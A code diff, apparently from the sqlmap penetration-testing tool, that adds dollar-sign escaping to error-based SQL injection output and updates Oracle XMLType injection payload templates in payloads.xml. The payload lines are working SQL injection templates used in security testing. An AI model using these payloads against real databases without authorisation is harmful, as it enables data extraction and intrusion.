diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 4ceb66505..f808f8e70 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -344,7 +344,7 @@ def checkSqlInjection(place, parameter, value):
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
- result = output.replace(kb.misc.space, " ") == "1"
+ result = output == "1"
if result:
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index c5352d2ac..4ad9daac1 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -216,6 +216,7 @@ class Agent:
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
+ payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
if origValue is not None:
diff --git a/lib/core/option.py b/lib/core/option.py
index 24f949e14..d78a5a8ea 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1256,6 +1256,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
+ kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.forcedDbms = None
if flushAll:
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f5410dea2..61700edcb 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -94,6 +94,8 @@ def __oneShotErrorUse(expression, field):
retVal = output
break
+ retVal = __errorReplaceChars(retVal)
+
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
return retVal
@@ -134,13 +136,22 @@ def __errorFields(expression, expressionFields, expressionFieldsList, expected=N
if isinstance(num, int):
expression = origExpr
- if output:
- output = output.replace(kb.misc.space, " ")
-
outputs.append(output)
return outputs
+def __errorReplaceChars(value):
+ """
+ Restores safely replaced characters
+ """
+
+ retVal = value
+
+ if value:
+ retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
+
+ return retVal
+
def errorUse(expression, expected=None, resumeValue=True, dump=False):
"""
Retrieve the output of a SQL query taking advantage of the error-based
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 6b6c34971..1ff829f4a 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1055,9 +1055,9 @@ Formats:
0
1
1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]